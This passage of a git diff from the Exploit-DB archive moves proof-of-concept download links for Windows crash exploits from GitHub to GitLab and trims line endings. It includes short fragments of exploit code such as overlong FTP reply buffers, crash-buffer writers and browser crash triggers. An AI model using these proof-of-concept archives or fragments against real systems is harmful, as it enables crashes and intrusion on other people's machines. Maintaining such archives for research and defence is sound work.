-https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41364.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41364.zip \ No newline at end of file diff --git a/exploits/windows/dos/41365.txt b/exploits/windows/dos/41365.txt index e5bd28f07..17eab1b3c 100644 --- a/exploits/windows/dos/41365.txt +++ b/exploits/windows/dos/41365.txt @@ -74,4 +74,4 @@ Resetting default scope Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41365.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41365.zip \ No newline at end of file diff --git a/exploits/windows/dos/41367.txt b/exploits/windows/dos/41367.txt index 7a27e2fab..c9d38d4ef 100644 --- a/exploits/windows/dos/41367.txt +++ b/exploits/windows/dos/41367.txt @@ -9,7 +9,7 @@ POC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41367.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41367.zip Open the malicious fpx file with CTRL+U, served by a webserver: @@ -76,4 +76,4 @@ Invalid exception stack at ffffffff 2017-02-09 information sent with the PoC -no reply if they plan to release a fix or not +no reply if they plan to release a fix or not \ No newline at end of file diff --git a/exploits/windows/dos/41417.txt b/exploits/windows/dos/41417.txt index c5ba07bda..589c090a9 100644 --- a/exploits/windows/dos/41417.txt +++ b/exploits/windows/dos/41417.txt @@ -80,4 +80,4 @@ In this crash eax is pointing to an invalid memory region and is being dereferen Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41417.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41417.zip \ No newline at end of file diff --git a/exploits/windows/dos/41418.txt b/exploits/windows/dos/41418.txt index 7a804d43b..4593866f6 100644 --- a/exploits/windows/dos/41418.txt +++ b/exploits/windows/dos/41418.txt @@ -113,4 +113,4 @@ Looking at the logic flow from this function we see at the very first call to ms Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41418.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41418.zip \ No newline at end of file diff --git a/exploits/windows/dos/41419.txt b/exploits/windows/dos/41419.txt index 0d95aa0f3..4ba015346 100644 --- a/exploits/windows/dos/41419.txt +++ b/exploits/windows/dos/41419.txt @@ -72,4 +72,4 @@ The issue here is that when dbcs_flag is false the 4 byte boundary version can a Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41419.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41419.zip \ No newline at end of file diff --git a/exploits/windows/dos/41474.py b/exploits/windows/dos/41474.py index fb3e26f9b..228fc5a12 100755 --- a/exploits/windows/dos/41474.py +++ b/exploits/windows/dos/41474.py @@ -27,4 +27,4 @@ while True: conn.send('220 '+buffer+'\r\n') conn.recv(1024) conn.send('250 '+buffer+'\r\n') - conn.close() + conn.close() \ No newline at end of file diff --git a/exploits/windows/dos/41645.txt b/exploits/windows/dos/41645.txt index ab47a045f..33e72d20a 100644 --- a/exploits/windows/dos/41645.txt +++ b/exploits/windows/dos/41645.txt @@ -77,4 +77,4 @@ Since the additional detail is crucial to observe the symptoms of the bug and it Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41645.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41645.zip \ No newline at end of file diff --git a/exploits/windows/dos/41646.txt b/exploits/windows/dos/41646.txt index 08336d9a1..5ea40da70 100644 --- a/exploits/windows/dos/41646.txt +++ b/exploits/windows/dos/41646.txt @@ -49,4 +49,4 @@ Attached is an archive with the original and modified TTF files. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41646.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41646.zip \ No newline at end of file diff --git a/exploits/windows/dos/41647.txt b/exploits/windows/dos/41647.txt index b9a3eef1a..790d045a0 100644 --- a/exploits/windows/dos/41647.txt +++ b/exploits/windows/dos/41647.txt @@ -66,4 +66,4 @@ Attached is an archive with 3 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41647.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41647.zip \ No newline at end of file diff --git a/exploits/windows/dos/41648.txt b/exploits/windows/dos/41648.txt index 6ff9cf469..fb946daa8 100644 --- a/exploits/windows/dos/41648.txt +++ b/exploits/windows/dos/41648.txt @@ -64,4 +64,4 @@ Attached is an archive with 3 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41648.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41648.zip \ No newline at end of file diff --git a/exploits/windows/dos/41649.txt b/exploits/windows/dos/41649.txt index 5777ce853..9541fe83c 100644 --- a/exploits/windows/dos/41649.txt +++ b/exploits/windows/dos/41649.txt @@ -55,4 +55,4 @@ Attached is an archive with 2 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41649.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41649.zip \ No newline at end of file diff --git a/exploits/windows/dos/41650.txt b/exploits/windows/dos/41650.txt index fadff6b59..d5bc8ca30 100644 --- a/exploits/windows/dos/41650.txt +++ b/exploits/windows/dos/41650.txt @@ -61,4 +61,4 @@ Attached is a proof of concept malformed font file which triggers the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41650.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41650.zip \ No newline at end of file diff --git a/exploits/windows/dos/41651.txt b/exploits/windows/dos/41651.txt index eeea6e0f6..b011b615e 100644 --- a/exploits/windows/dos/41651.txt +++ b/exploits/windows/dos/41651.txt @@ -85,4 +85,4 @@ Attached is an archive with 3 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41651.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41651.zip \ No newline at end of file diff --git a/exploits/windows/dos/41652.txt b/exploits/windows/dos/41652.txt index 6fd81bfde..73f7f5b0f 100644 --- a/exploits/windows/dos/41652.txt +++ b/exploits/windows/dos/41652.txt @@ -66,4 +66,4 @@ Attached is an archive with 3 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41652.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41652.zip \ No newline at end of file diff --git a/exploits/windows/dos/41653.txt b/exploits/windows/dos/41653.txt index cc8e3b9f8..3d3b3e613 100644 --- a/exploits/windows/dos/41653.txt +++ b/exploits/windows/dos/41653.txt @@ -72,4 +72,4 @@ Attached is an archive with 2 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41653.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41653.zip \ No newline at end of file diff --git a/exploits/windows/dos/41654.txt b/exploits/windows/dos/41654.txt index 8566a9214..aa8eeb0a2 100644 --- a/exploits/windows/dos/41654.txt +++ b/exploits/windows/dos/41654.txt @@ -28,4 +28,4 @@ Attached is a proof of concept malformed font file which triggers the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41654.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41654.zip \ No newline at end of file diff --git a/exploits/windows/dos/41655.txt b/exploits/windows/dos/41655.txt index a063655d2..5b8f4678d 100644 --- a/exploits/windows/dos/41655.txt +++ b/exploits/windows/dos/41655.txt @@ -40,4 +40,4 @@ Attached is an archive with textual crash excerpts and up to 3 samples per each Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41655.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41655.zip \ No newline at end of file diff --git a/exploits/windows/dos/41656.txt b/exploits/windows/dos/41656.txt index 2ac50d682..3807c7a45 100644 --- a/exploits/windows/dos/41656.txt +++ b/exploits/windows/dos/41656.txt @@ -37,4 +37,4 @@ Attached is an archive with two samples, which trigger crashes at two different Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41656.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41656.zip \ No newline at end of file diff --git a/exploits/windows/dos/41657.txt b/exploits/windows/dos/41657.txt index e5a44ae62..379ccbbd9 100644 --- a/exploits/windows/dos/41657.txt +++ b/exploits/windows/dos/41657.txt @@ -80,4 +80,4 @@ Attached is a color profile which triggers the above crash. In order to reproduc Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41657.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41657.zip \ No newline at end of file diff --git a/exploits/windows/dos/41658.txt b/exploits/windows/dos/41658.txt index 047c3f282..aa255d0c5 100644 --- a/exploits/windows/dos/41658.txt +++ b/exploits/windows/dos/41658.txt @@ -45,4 +45,4 @@ Attached is ane EMF file which triggers the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41658.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41658.zip \ No newline at end of file diff --git a/exploits/windows/dos/41659.txt b/exploits/windows/dos/41659.txt index 2b726908e..e15305bbd 100644 --- a/exploits/windows/dos/41659.txt +++ b/exploits/windows/dos/41659.txt @@ -27,4 +27,4 @@ Attached are two color profiles which trigger the crash at two different offsets Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41659.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41659.zip \ No newline at end of file diff --git a/exploits/windows/dos/41661.html b/exploits/windows/dos/41661.html index 814a8535b..2040814bd 100644 --- a/exploits/windows/dos/41661.html +++ b/exploits/windows/dos/41661.html @@ -126,5 +126,5 @@ where the old value was deleated at Note: because the text allocations aren't protected by MemGC and happen on the process heap, use-after-free bugs dealing with text allocations are still exploitable. Screenshots: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41661.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41661.zip --> \ No newline at end of file diff --git a/exploits/windows/dos/41737.txt b/exploits/windows/dos/41737.txt index 17fb48af8..c81c3a298 100644 --- a/exploits/windows/dos/41737.txt +++ b/exploits/windows/dos/41737.txt @@ -44,7 +44,4 @@ Tested on: Windows 7 -Win xp - - - +Win xp \ No newline at end of file diff --git a/exploits/windows/dos/41756.txt b/exploits/windows/dos/41756.txt index 239dbef62..a7907c344 100644 --- a/exploits/windows/dos/41756.txt +++ b/exploits/windows/dos/41756.txt @@ -91,4 +91,4 @@ According to my tests, the copied bytes are always 0x00, so that's why it seems Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41756.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41756.zip \ No newline at end of file diff --git a/exploits/windows/dos/41879.txt b/exploits/windows/dos/41879.txt index 3beece78d..48d13d807 100644 --- a/exploits/windows/dos/41879.txt +++ b/exploits/windows/dos/41879.txt @@ -151,4 +151,4 @@ Attached is a PoC program for Windows 7 32-bit (usermode_oob_write.cpp), and a b Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41879.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41879.zip \ No newline at end of file diff --git a/exploits/windows/dos/42009.txt b/exploits/windows/dos/42009.txt index 3cc8d2941..cee88b818 100644 --- a/exploits/windows/dos/42009.txt +++ b/exploits/windows/dos/42009.txt @@ -209,4 +209,4 @@ The issue reproduces on Windows 7, and is easiest to observe with Special Pools Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42009.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42009.zip \ No newline at end of file diff --git a/exploits/windows/dos/42021.txt b/exploits/windows/dos/42021.txt index 50b5b0a75..d4398cf77 100644 --- a/exploits/windows/dos/42021.txt +++ b/exploits/windows/dos/42021.txt @@ -87,4 +87,4 @@ It did it! Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42021.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42021.zip \ No newline at end of file diff --git a/exploits/windows/dos/42081.txt b/exploits/windows/dos/42081.txt index 852d7d2b7..5fd67f7d5 100644 --- a/exploits/windows/dos/42081.txt +++ b/exploits/windows/dos/42081.txt @@ -32,4 +32,4 @@ Attached is a ZIP archive (password: "mpengbugs") with up to 3 testcases for eac Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42081.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42081.zip \ No newline at end of file diff --git a/exploits/windows/dos/42088.txt b/exploits/windows/dos/42088.txt index cd9f4584e..559556ab5 100644 --- a/exploits/windows/dos/42088.txt +++ b/exploits/windows/dos/42088.txt @@ -68,4 +68,4 @@ String.prototype.slice.call(x, l); Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42088.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42088.zip \ No newline at end of file diff --git a/exploits/windows/dos/42092.txt b/exploits/windows/dos/42092.txt index 786fff2fb..9f8ca478b 100644 --- a/exploits/windows/dos/42092.txt +++ b/exploits/windows/dos/42092.txt @@ -8,4 +8,4 @@ The password of the zip file is "calleruaf" Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42092.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42092.zip \ No newline at end of file diff --git a/exploits/windows/dos/42214.txt b/exploits/windows/dos/42214.txt index 63ea07605..060a5ec6e 100644 --- a/exploits/windows/dos/42214.txt +++ b/exploits/windows/dos/42214.txt @@ -41,4 +41,4 @@ The issue can be reproduced by running the attached proof-of-concept program on Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42214.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42214.zip \ No newline at end of file diff --git a/exploits/windows/dos/42230.txt b/exploits/windows/dos/42230.txt index a4f57801f..64b594842 100644 --- a/exploits/windows/dos/42230.txt +++ b/exploits/windows/dos/42230.txt @@ -29,4 +29,4 @@ Repeatedly triggering the vulnerability could allow local authenticated attacker Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42230.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42230.zip \ No newline at end of file diff --git a/exploits/windows/dos/42234.txt b/exploits/windows/dos/42234.txt index 5cfa6ac16..6271eb83a 100644 --- a/exploits/windows/dos/42234.txt +++ b/exploits/windows/dos/42234.txt @@ -81,4 +81,4 @@ Attached are 6 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42234.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42234.zip \ No newline at end of file diff --git a/exploits/windows/dos/42235.txt b/exploits/windows/dos/42235.txt index 7e0cdfc97..2d0b8a1fc 100644 --- a/exploits/windows/dos/42235.txt +++ b/exploits/windows/dos/42235.txt @@ -76,4 +76,4 @@ Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42235.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42235.zip \ No newline at end of file diff --git a/exploits/windows/dos/42236.txt b/exploits/windows/dos/42236.txt index c3d29f3d4..662417f5b 100644 --- a/exploits/windows/dos/42236.txt +++ b/exploits/windows/dos/42236.txt @@ -44,4 +44,4 @@ Attached are 2 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42236.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42236.zip \ No newline at end of file diff --git a/exploits/windows/dos/42237.txt b/exploits/windows/dos/42237.txt index 2bda019a8..12e74a17f 100644 --- a/exploits/windows/dos/42237.txt +++ b/exploits/windows/dos/42237.txt @@ -42,4 +42,4 @@ Attached is a proof of concept malformed font file which triggers the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42237.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42237.zip \ No newline at end of file diff --git a/exploits/windows/dos/42238.txt b/exploits/windows/dos/42238.txt index 9e3a2dca0..77b248805 100644 --- a/exploits/windows/dos/42238.txt +++ b/exploits/windows/dos/42238.txt @@ -46,4 +46,4 @@ Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42238.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42238.zip \ No newline at end of file diff --git a/exploits/windows/dos/42239.txt b/exploits/windows/dos/42239.txt index b88f5dad5..c6c29e9c5 100644 --- a/exploits/windows/dos/42239.txt +++ b/exploits/windows/dos/42239.txt @@ -73,4 +73,4 @@ Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42239.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42239.zip \ No newline at end of file diff --git a/exploits/windows/dos/42240.txt b/exploits/windows/dos/42240.txt index 3e87725c9..f4cc1873c 100644 --- a/exploits/windows/dos/42240.txt +++ b/exploits/windows/dos/42240.txt @@ -44,4 +44,4 @@ Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42240.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42240.zip \ No newline at end of file diff --git a/exploits/windows/dos/42241.txt b/exploits/windows/dos/42241.txt index 42b24973c..30ccd357c 100644 --- a/exploits/windows/dos/42241.txt +++ b/exploits/windows/dos/42241.txt @@ -46,4 +46,4 @@ Attached are 2 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42241.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42241.zip \ No newline at end of file diff --git a/exploits/windows/dos/42243.txt b/exploits/windows/dos/42243.txt index 2c7f68d28..5be7e826a 100644 --- a/exploits/windows/dos/42243.txt +++ b/exploits/windows/dos/42243.txt @@ -82,4 +82,4 @@ The issue reproduces on Windows 7 (other platforms untested). It is easiest to r Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42243.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42243.zip \ No newline at end of file diff --git a/exploits/windows/dos/42264.txt b/exploits/windows/dos/42264.txt index 17c0758b9..b4ffd52ff 100644 --- a/exploits/windows/dos/42264.txt +++ b/exploits/windows/dos/42264.txt @@ -159,4 +159,4 @@ ChildEBP RetAddr Args to Child Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42264.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42264.zip \ No newline at end of file diff --git a/exploits/windows/dos/42480.txt b/exploits/windows/dos/42480.txt index cdd5904ae..a795b6a0d 100644 --- a/exploits/windows/dos/42480.txt +++ b/exploits/windows/dos/42480.txt @@ -4,4 +4,4 @@ The attached fuzzed swf file causes the traits of an ActionScript object to be a Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42480.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42480.zip \ No newline at end of file diff --git a/exploits/windows/dos/42741.cpp b/exploits/windows/dos/42741.cpp index 6a0ed80a5..af55ea1ad 100644 --- a/exploits/windows/dos/42741.cpp +++ b/exploits/windows/dos/42741.cpp @@ -123,4 +123,4 @@ int main(int argc, char **argv) { DeleteDC(hdc); return 0; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/42742.cpp b/exploits/windows/dos/42742.cpp index d7106f7c7..98e0ee717 100644 --- a/exploits/windows/dos/42742.cpp +++ b/exploits/windows/dos/42742.cpp @@ -153,4 +153,4 @@ int main() { DestroyWindow(hwnd); return 0; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/42744.txt b/exploits/windows/dos/42744.txt index 17560365e..00eca5ce3 100644 --- a/exploits/windows/dos/42744.txt +++ b/exploits/windows/dos/42744.txt @@ -121,4 +121,4 @@ Attached is an archive with several proof-of-concept mutated TTF files. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42744.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42744.zip \ No newline at end of file diff --git a/exploits/windows/dos/42746.txt b/exploits/windows/dos/42746.txt index 3f6ff20dc..a48bd26c7 100644 --- a/exploits/windows/dos/42746.txt +++ b/exploits/windows/dos/42746.txt @@ -110,4 +110,4 @@ Attached is an archive with several proof-of-concept mutated TTF files. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42746.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42746.zip \ No newline at end of file diff --git a/exploits/windows/dos/42747.cpp b/exploits/windows/dos/42747.cpp index f9894cdad..8dbf31337 100644 --- a/exploits/windows/dos/42747.cpp +++ b/exploits/windows/dos/42747.cpp @@ -84,4 +84,4 @@ int main() { PrintHex(OutputBuffer, sizeof(OutputBuffer)); return 0; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/42749.cpp b/exploits/windows/dos/42749.cpp index 7e489417e..1fe46497c 100644 --- a/exploits/windows/dos/42749.cpp +++ b/exploits/windows/dos/42749.cpp @@ -151,4 +151,4 @@ int main() { DeleteDC(pd.hDC); return 0; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/42750.cpp b/exploits/windows/dos/42750.cpp index 89a90b8dd..6348d3fcc 100644 --- a/exploits/windows/dos/42750.cpp +++ b/exploits/windows/dos/42750.cpp @@ -116,4 +116,4 @@ int main() { PrintHex(OutputBuffer, sizeof(OutputBuffer)); return 0; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/42758.txt b/exploits/windows/dos/42758.txt index e2d765f60..f37b97cbc 100644 --- a/exploits/windows/dos/42758.txt +++ b/exploits/windows/dos/42758.txt @@ -112,4 +112,4 @@ edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructo Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42758.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42758.zip \ No newline at end of file diff --git a/exploits/windows/dos/42763.html b/exploits/windows/dos/42763.html index ed535c72c..eeac3a9d1 100644 --- a/exploits/windows/dos/42763.html +++ b/exploits/windows/dos/42763.html @@ -19,4 +19,4 @@ function f() { } = {}); } -f(); +f(); \ No newline at end of file diff --git a/exploits/windows/dos/42764.html b/exploits/windows/dos/42764.html index f4f398b0a..3a673a37e 100644 --- a/exploits/windows/dos/42764.html +++ b/exploits/windows/dos/42764.html @@ -82,4 +82,4 @@ let h = function f(a0 = (function () { for (let i = 0; i < 0x10000; i++) { h(); -} +} \ No newline at end of file diff --git a/exploits/windows/dos/42917.py b/exploits/windows/dos/42917.py index 53bf2445a..615ad07a2 100755 --- a/exploits/windows/dos/42917.py +++ b/exploits/windows/dos/42917.py @@ -29,4 +29,4 @@ b = junk+EIP+"D"*500 f = open('buffer.txt','w') f.write(b) -f.close() +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/42962.py b/exploits/windows/dos/42962.py index b774cb24f..3f1309f36 100755 --- a/exploits/windows/dos/42962.py +++ b/exploits/windows/dos/42962.py @@ -33,4 +33,4 @@ while True: print(conn.recv(1024)) conn.send('230 OK\r\n') print(conn.recv(1024)) - conn.send('220 "'+buffer+'" is current directory\r\n') + conn.send('220 "'+buffer+'" is current directory\r\n') \ No newline at end of file diff --git a/exploits/windows/dos/42994.txt b/exploits/windows/dos/42994.txt index a742af291..64cdf25c0 100644 --- a/exploits/windows/dos/42994.txt +++ b/exploits/windows/dos/42994.txt @@ -78,6 +78,4 @@ machine. That´s it, now just open the 'GLK' files. Both 'cmd.exe' and the CPL file should be executed/loaded. Notice the files located in the remote share will take longer than 'CMD.exe' to be executed for obvious -reasons, just wait a few seconds. - - +reasons, just wait a few seconds. \ No newline at end of file diff --git a/exploits/windows/dos/42995.txt b/exploits/windows/dos/42995.txt index e606c00e8..cd7b63f56 100644 --- a/exploits/windows/dos/42995.txt +++ b/exploits/windows/dos/42995.txt @@ -33,4 +33,4 @@ chars long, so we could still fake/spoof it as another Office app (the app name Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42995.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42995.zip \ No newline at end of file diff --git a/exploits/windows/dos/42997.txt b/exploits/windows/dos/42997.txt index faa3dca85..9e628b62e 100644 --- a/exploits/windows/dos/42997.txt +++ b/exploits/windows/dos/42997.txt @@ -31,4 +31,4 @@ The class creation succeeded and the HTML file executed notepad. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42997.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42997.zip \ No newline at end of file diff --git a/exploits/windows/dos/43001.cpp b/exploits/windows/dos/43001.cpp index ff2809e93..0a2ec3f0f 100644 --- a/exploits/windows/dos/43001.cpp +++ b/exploits/windows/dos/43001.cpp @@ -120,4 +120,4 @@ int main() { CloseHandle(hFile); return 0; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/43026.py b/exploits/windows/dos/43026.py index 5748b8c22..90846e0c9 100755 --- a/exploits/windows/dos/43026.py +++ b/exploits/windows/dos/43026.py @@ -58,5 +58,4 @@ def main(): t.start() if __name__ == '__main__': - main() - + main() \ No newline at end of file diff --git a/exploits/windows/dos/43058.c b/exploits/windows/dos/43058.c index a0bbf309b..f2844353e 100644 --- a/exploits/windows/dos/43058.c +++ b/exploits/windows/dos/43058.c @@ -133,9 +133,4 @@ int main(int argc, char *argv[]) CloseHandle(hDevice); return 0; -} - - - - - +} \ No newline at end of file diff --git a/exploits/windows/dos/43060.py b/exploits/windows/dos/43060.py index cb7d46fb4..3762d17b9 100755 --- a/exploits/windows/dos/43060.py +++ b/exploits/windows/dos/43060.py @@ -173,4 +173,4 @@ def main(): if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/exploits/windows/dos/43124.py b/exploits/windows/dos/43124.py index f39625021..acc597fc4 100755 --- a/exploits/windows/dos/43124.py +++ b/exploits/windows/dos/43124.py @@ -22,6 +22,4 @@ crash = "A"*24538 #crashes on 24538, but more will do writeFile = open (file, "w") writeFile.write( crash ) -writeFile.close() - - +writeFile.close() \ No newline at end of file diff --git a/exploits/windows/dos/4335.txt b/exploits/windows/dos/4335.txt index 97e2676a6..03c9879fa 100644 --- a/exploits/windows/dos/4335.txt +++ b/exploits/windows/dos/4335.txt @@ -5,6 +5,6 @@ Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit 3.when the otherside accept the invatation , inject the dll to local yahoo! messenger 8.1.0.413 's process. 4 . the otherside's yahoo! messenger will be crashed. -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4335.rar (08292007-expyahoo.rar) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4335.rar (08292007-expyahoo.rar) # milw0rm.com [2007-08-29] \ No newline at end of file diff --git a/exploits/windows/dos/43373.txt b/exploits/windows/dos/43373.txt index 19f73257b..c128aa591 100644 --- 